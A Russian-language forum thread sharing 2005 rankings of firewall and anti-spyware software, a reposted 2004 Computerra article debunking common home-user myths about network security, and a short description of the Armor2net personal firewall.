4.Norman Personal Firewall
5.SurfSecret Personal Firewall
6.McAfee Personal Firewall Plus
7.Sygate Personal Firewall Pro
8.Injoy Firewall
9.BlackICE PC Protection
10.Personal Firewall Pro
11.Kaspersky Anti-Hacker
12.F-Secure Internet Security
13.PC-cillin Internet Security
14.Armor2net
15.Tiny Firewall
16.Privatefirewall
17.BullGuard
18.Freedom Firewall
19.NetBarrier
20.CheckIt Firewall





Рейтинг программ по ловле шпионов, троянов и прочей нечисти. Особых неожиданностей нет. Весьма популярная у нас в Рунете немецкая компания Lavasoft со своей профессиональной версией Ad-aware Pro занимает седьмое место.
Anti-Spyware Software Reviews 2005
1.Spyware Eliminator
2.Spy Sweeper
3.AntiSpy
4.SpySubtract
5.SpyRemover
6.SpyHunter
7.Ad-aware Pro
8.BPS Spyware Remover
9.Adware Remover Gold
10.TZ-Spyware-Adware Remover
11.TrueWatch
12.Spy Killer
13.SpyCleaner
14.SpyKiller 2004
15.Spyware BeGone
16.Spyware Killa
17.Spyware Crusher

по материалам http://www.izcity.com/
 

Doctor Grif

Ословед
Миф о сетевой безопасности и его разоблачение

ИНТЕРНЕТ - журнал "Компьютерра"
Миф о сетевой безопасности и его разоблачение

Автор: Александр Красоткин
Опубликовано в журнале "Компьютерра" №21 от 1 июня 2004 года.

Подключившись к Интернету по выделенной линии, я сразу поставил файрволл производства McAfee. Больше для порядка, чем с целью борьбы с непрошеными гостями.

Кому мой компьютер нужен? Чего ради кто-то в него полезет? Однако поутру волосы стояли торчком: firewall рапортовал о нескольких попытках проникновения в систему. Кто-то сканировал порты, кто-то норовил запустить скрипт... и этих американцев, французов, украинцев и милых сердцу россиян интересовал именно мой, ничем не примечательный компьютер. Однажды файрволл не справился, и на некоторое время родной ПК превратился в арену для демонстрации всплывающих окон с рекламой салонов интим-услуг, причем впервые подобное окно появилось во время просмотра новостей на РБК... Подумываю даже удалить файрволл: боязно, конечно, зато страх как интересно.

В общем, самое время завести в "Компьютерре" рубрику о способах борьбы за сетевую безопасность. Открывает ее материал, развеивающий множество мифов в этой области, а следующие статьи помогут читателю безболезненно, шаг за шагом, превратить свой компьютер в оазис чистоты и благополучия в этом ужасно неблагополучном Интернете. - Сергей Вильянов

Составляя рейтинг технологий, пышным цветом расцветших в последние годы на ниве Интернета, первое место следует отдать вирусам. Червь Морриса, в свое время потрясший компьютерный мир, выглядит безобидной студенческой шуткой по сравнению с нынешними хищниками глобальной сети. Вирусы стали гораздо изощреннее, технологичнее, изящнее. Многие можно назвать настоящими произведениями искусства, превратившими Интернет в далеко небезопасную среду.

Люди же остались людьми: самоуверенными, ленивыми, недальновидными. По долгу службы участвуя в расследовании сетевых инцидентов, произошедших с клиентами Интернет-провайдера (его имя в данном случае роли не играет), я заметил: ни один из них не допускал мысли, что может пострадать от онлайновых злоумышленников. У каждого из клиентов были определенные идеи, дающие уверенность в собственной безопасности. На поверку такая защита оказалась эфемерной.

Мало-помалу у меня набралась небольшая коллекция подобных заблуждений, которую я и предлагаю вашему вниманию. Почему ошибки каких-то незнакомых людей должны представлять интерес, спросите вы? Отвечаю: во всех случаях клиенты несли потери. Прямые убытки, связанные с восстановлением систем и оплатой вирусного трафика, достигали нескольких тысяч долларов. Суммы косвенных убытков - от уничтожения, хищения и неправомерного использования данных - остались за кадром. Посмотрите, вдруг среди изложенных ниже заблуждений вы найдете что-то до боли знакомое? В конце концов, лучше учиться на чужих ошибках…
До сих пор бог меня миловал, а потому ничего страшного не произойдет и впредь.

Убойный по своей логике аргумент в нашем меняющемся мире. Жители Помпеи думали так же.
На моем ПК нет ничего важного. Что собака из кузни упрет?

Взломанная система может, в частности, использоваться как плацдарм для дальнейшего нападения. Представьте "радость" владельца взломанной системы, виновного только в своей некомпетентности, от общения со службой безопасности какой-нибудь серьезной организации, атакованной злоумышленниками.
Мой домашний компьютер подсоединен к Интернету через модем. Если заражусь, переставлю систему и только.

Есть несколько вирусов, создающих новое модемное соединение ("удаленное соединение" в Windows OS). Алгоритм их работы выглядит так:
система заражается;
создается новое "удаленное соединение", но не с местным провайдером, а с другим, сидящим на платной международной линии;
разрывается текущее модемное соединение (выглядит как обычный обрыв связи, печально знакомый многим дайлапщикам); когда же пользователь возобновляет соединение, то подключается к Интернету уже через новое соединение по оплачиваемой линии.
в конце месяца приходит телефонный счет с очень большим количеством нулей.

На мой взгляд, домашние компьютеры - наиболее частая добыча злоумышленников. Большинство пользователей не ставят брандмауэр и антивирус потому, что система начинает медленно работать. Заплатки качать по модему - долго. Но удивляются, когда у них крадут пароли доступа к провайдеру.
У меня есть брандмауэр (он же сетевой фильтр, файрволл), чего мне бояться?

Его еще надо правильно настроить. Проверить корректность настройки брандмауэров можно сетевым сканером, позволяющим выявить доступные из Интернета сетевые сервисы на исследуемой системе. Особый класс подобных устройств - сканеры вторжения (сканеры безопасности), которые проверяют устойчивость сетевых сервисов к взлому.

Примечание. Выбирая программный персональный брандмауэр, проверьте, есть ли в нем средства контроля сетевой активности пользовательских приложений, позволяющие для каждой программы задать свою политику сетевой активности.
У меня стоит антивирус.

Первое. Антивирусы не защищают от сетевых вторжений (откуда взялось это распространенное заблуждение - хоть убей, не знаю), у них совсем другая задача.

Второе. Не вдаваясь в религиозный спор, какой антивирус лучше, отмечу:
не стоит забывать про обновления;
обновления антивирусных баз выходят после появления вирусов, а не до.

Третье. Защита должна быть комплексной. Я был свидетелем случая, когда произошло заражение компьютера через дыру в браузере. Хотя антивирус подозрительной активности не обнаружил, брандмауэр упрямо сообщал о попытках загрузить некие файлы из Интернета по ftp. По этому признаку вычислили вирус. Соответствующее обновление антивирусной базы последовало через день. Заплатка для браузера появилась лишь через полтора месяца.
Если не запускать файлы, вложенные в письма электронной почты, то заразиться нельзя.

Заражение происходит через дыру в программе-клиенте почтовой службы.
Если ходить по веб-страничкам, то не заразишься.

Есть два способа заражения при просмотре страничек:
через уязвимости самих браузеров;
через "активные" элементы страниц.

Следует не только своевременно обновлять уязвимые программы, но и ограничивать выполнение различных "активных" элементов (ActiveX, Java-апплеты, VBS/Java-скрипты и т. п.) при просмотре документов с "ненадежных" сайтов.

Примечание. Вирус можно подхватить и на вполне благонамеренном сайте, ранее взломанном злоумышленниками. Например, несколько видов червей используют комплексную систему распространения. Взламывая сайты, они модифицируют содержимое веб-страничек, вставляя вредоносные программные элементы. Посредством этого заражаются клиенты взломанного сайта. С зараженных машин клиентов начинаются новые атаки на сайты и т. д.
У меня операционная система X, а такие-то программы - Y. Поэтому я ничего не боюсь.

Напрасно. Не встревая в спор, что must die, а что нет, отмечу: в истории подавляющего большинства прикладных программ и операционных систем можно найти уязвимые версии. Поэтому лучше принять за аксиому, что уязвимо всё (кто порекомендует хорошего психотерапевта?), только не для всего еще есть заплатки.
Ко мне пришло письмо от Васи Сидорова, но Вася говорит, что его не отправлял.

Если предположить, что Вася Сидоров не обманывает и что никто не получал доступ к его компьютеру, то вы получили подложное письмо. Большинство почтовых серверов не запрашивают верификационные данные пользователя (имя, пароль) при отправлении почты, так что действительно существует возможность отправки письма от чужого имени. Для подтверждения достоверности корреспонденции следует пользоваться цифровой подписью. Это позволит определить достоверность отправителя и проверить целостность сообщения (защита от модификаций).
Спокойно выхожу в Интернет из компьютерных клубов.

В локальных сетях существует возможность перехвата данных посторонним лицом. Некоторые прикладные сетевые протоколы (почтовые - SMTP/POP3, FTP, ICQ и т. п.) передают информацию в открытом (незакодированном) виде, что делает ее полностью доступной всем заинтересованным лицам. Для предотвращения этой возможности владельцам локальных сетей нужно предпринимать определенные материальные и интеллектуальные усилия. Разумеется, ничего подобного, как правило, не делается. Возможно, большинство людей не оперирует своими средствами в Интернет-банках из компьютерных клубов, но лишиться своей "аськи" из-за понравившегося кому-то номера - удовольствие не из приятных.
Поставил брандмауэр, антивирус. Выставил все заплатки. Теперь отдыхаю.

Вспомните о непотопляемом чуде инженерной мысли - "Титанике". Лучше априори предположить, что в системе защиты есть как минимум одна серьезная дыра и куча маленьких. Разыскав их, имеете шанс опередить злоумышленников.

- Александр Красоткин

В заключение приведу избранные отрывки из разговоров сотрудников (С) компании-провайдера с клиентами (К), участником и свидетелем которых мне посчастливилось быть.

С: В последний раз ваш антивирус обновлялся 14 апреля 2001 года (разговор происходит в апреле 2004-го).
К: Это же "Касперский" (антивирус лаборатории Касперского, версия 3.0)! Он в прошлом году в Европе приз получил! Сам по радио слышал!
С: В системе обнаружено три разных вируса. Заражено больше шестисот файлов.
К: Но этот компьютер нельзя было проверять! На нем работает "1С:Бухгалтерия", а антивирус при проверке выбивает ее!
С: Можно было проверять вечером, после работы.
К: Ну что вы! У нас в организации рабочий день строго регламентирован. Ровно в 18:00 все домой уходят.
С: Вирус, обнаруженный при проверке в памяти компьютера, создавал сетевой трафик.
К: Этого не может быть! Он же в памяти, а не в сети!
К: На сервере стоит брандмауэр, поэтому из сети меня взломать не могли.
С: Ваш сетевой фильтр настроен так, что пропускает все сетевые соединения на все порты.
К: Правильно. Это я так сделал. А то в анрыл побегать не получается.
К: Мои специалисты сказали, что, если картинки с веб-сайтов просматривать в браузере, то они не скачиваются на компьютер. Поэтому трафика расходуется меньше.
С: Насколько же?
К: Вы даже этого не знаете! Всем известно, что раз в двадцать - тридцать.
С: Вирус, обнаруженный на вашем компьютере, пытаясь распространиться дальше, активно устанавливал сетевые соединения. Отсюда и возник большой исходящий трафик.
К: Вирус этот я себе не устанавливал, поэтому его трафик оплачивать не буду.

Эти примеры дружеской пикировки можно было бы счесть забавными, если б не одно "но": за каждым из них стоит сетевой инцидент, произошедший по большей части из-за элементарной неосторожности или неосведомленности пользователей. А ведь базовые правила сетевой безопасности ничуть не сложнее правил дорожного движения.
 

Doctor Grif

Ословед
Еще один персональный фаервол, описание его возможностей выложу чуть позже
armor2nt.exe - 3.56 Mb [136-139]

ПыСы: описание
Программа: Armor2net Personal Firewall 3.12

Описание: Программа является персональным firewall'ом, и обеспечивает защиту при работе в сети Интернет, а также блокирует всплывающие окна и удаляет разного рода spyware.

Программа контролирует каждый пакет и отображает все активные подключения. Вы сможете определять, каким программам можно обращаться к сети, а каким нет. Можно запретить доступ к определенным сайтам. Также программа может просматривать память, системный реестр и жесткие диски компьютера в поисках spyware компонентов, которые вы сможете затем удалить.

URL производителя:http://www.armor2net.com/

Лицензия: $19.99

Платформы:Windows ALL
 
Сверху